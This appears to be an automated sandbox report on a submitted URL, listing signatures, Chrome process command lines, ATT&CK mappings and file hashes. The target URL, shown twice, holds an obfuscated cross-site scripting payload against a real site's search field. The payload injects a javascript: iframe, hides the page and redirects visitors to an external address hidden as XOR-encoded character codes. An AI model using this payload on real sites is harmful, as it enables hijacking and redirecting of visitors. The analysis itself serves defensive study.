Analysis

  • max time kernel
    37s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 14:42

General

  • Target

    https://essaglas.se/?s=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C103%2C122%2C114%2C28%2C110%2C109%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E9%2BH%23%7CD5ji6%2F%40sJ0%28_P%2F%5C%3Cimg%20src%3D%22e%2BAV%5EV%3F9b%7C%3A%3AuAG%27%40q-LLd%27%23%7C%26Xl%3Dfbap6Xczv5w2%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22%3A_%22%3E.%27Oe%23T~1IZ2%26Lf%40nAe%2Fx%23%21Y%3F%3B%3C%27TYLLJl%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C103%2C122%2C114%2C28%2C110%2C109%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu

Score
1/10

Malware Config

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://essaglas.se/?s=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C103%2C122%2C114%2C28%2C110%2C109%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E9%2BH%23%7CD5ji6%2F%40sJ0%28_P%2F%5C%3Cimg%20src%3D%22e%2BAV%5EV%3F9b%7C%3A%3AuAG%27%40q-LLd%27%23%7C%26Xl%3Dfbap6Xczv5w2%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22%3A_%22%3E.%27Oe%23T~1IZ2%26Lf%40nAe%2Fx%23%21Y%3F%3B%3C%27TYLLJl%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C103%2C122%2C114%2C28%2C110%2C109%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffa1e7eab58,0x7ffa1e7eab68,0x7ffa1e7eab78
      2⤵
        PID:1916
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:2
        2⤵
          PID:2984
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:8
          2⤵
            PID:3052
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2180 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:8
            2⤵
              PID:388
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:1
              2⤵
                PID:4336
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3060 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:1
                2⤵
                  PID:1604
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4508 --field-trial-handle=1900,i,7206825760923248019,10808733500660959934,131072 /prefetch:1
                  2⤵
                    PID:3240
                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                  1⤵
                    PID:2108

                  Network

                  MITRE ATT&CK Matrix ATT&CK v13

                  Discovery

                  Query Registry

                  1
                  T1012

                  System Information Discovery

                  1
                  T1082

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                    Filesize

                    96B

                    MD5

                    4dd2e2e28b11781c503404112b17a1b9

                    SHA1

                    0d15ef6e112d84a596f7ab786fe8015587fa2887

                    SHA256

                    ccda0fbc5d4cd89188cc9d96536cb6596e1cda43051453bbda35488f28ad0dfe

                    SHA512

                    6be83823848e18d2d220b8a9a68abb8c1af2183d7759eab936a8d240fc16e832906c8a3ccac558748092df62f9532bf4cd260433be84351b9e15c1551cf16c81

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                    Filesize

                    2B

                    MD5

                    d751713988987e9331980363e24189ce

                    SHA1

                    97d170e1550eee4afc0af065b78cda302a97674c

                    SHA256

                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                    SHA512

                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                    Filesize

                    520B

                    MD5

                    2c626157e1169a4679cfe300a39843be

                    SHA1

                    c4a839dd76266775b738b1a68e31b29737149764

                    SHA256

                    90e47b26d8c7e2c5a9385ace9a09aaa1255a08716c9c6f385c8b9f364d1968e4

                    SHA512

                    03d5934650c381bb9e19234a0778d9fabad210cafdbc91b06c4ede4f388cfb52d14b64f1f87819c4d55090546fc4a3934dabe7d9e022ff9e9a6ba7ee3bfbbd06

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                    Filesize

                    6KB

                    MD5

                    a87941d1d4d08e8fbdcf2507d37d24ee

                    SHA1

                    abc75bb2da2789a34a8e5af8c4ff8bfbd2729a5b

                    SHA256

                    cc9339ad22188aea910e4def08c17e42a512d332ea5aab77c13ae57c5e164f11

                    SHA512

                    8998d8e6670ce3de3feb78f1e6d0647f4c37fd99a2e9de4f1bf705fb584d304c694344adac68c30501fafb2af72e91b8910cb792fc99dbd26ab0e6ebdd2fbd03

                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                    Filesize

                    130KB

                    MD5

                    6c7235ec5b9cdc3b2b51c966ff180045

                    SHA1

                    65869457520791be66ec2247ccaaacaaa1699685

                    SHA256

                    bfebf23cb76cc7de4131767523cd15d090e28027057ba997276085baf9405533

                    SHA512

                    44e485a3f16d4da22ddd50b809024801b663ece927fad85d768aeced86251e206257507a5470f7a503f9aa2416f8eebaf75356870b24b1ca200c2249755c8371

                  • \??\pipe\crashpad_4804_WGERAEGIOFGQHWME
                    MD5

                    d41d8cd98f00b204e9800998ecf8427e

                    SHA1

                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                    SHA256

                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                    SHA512

                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e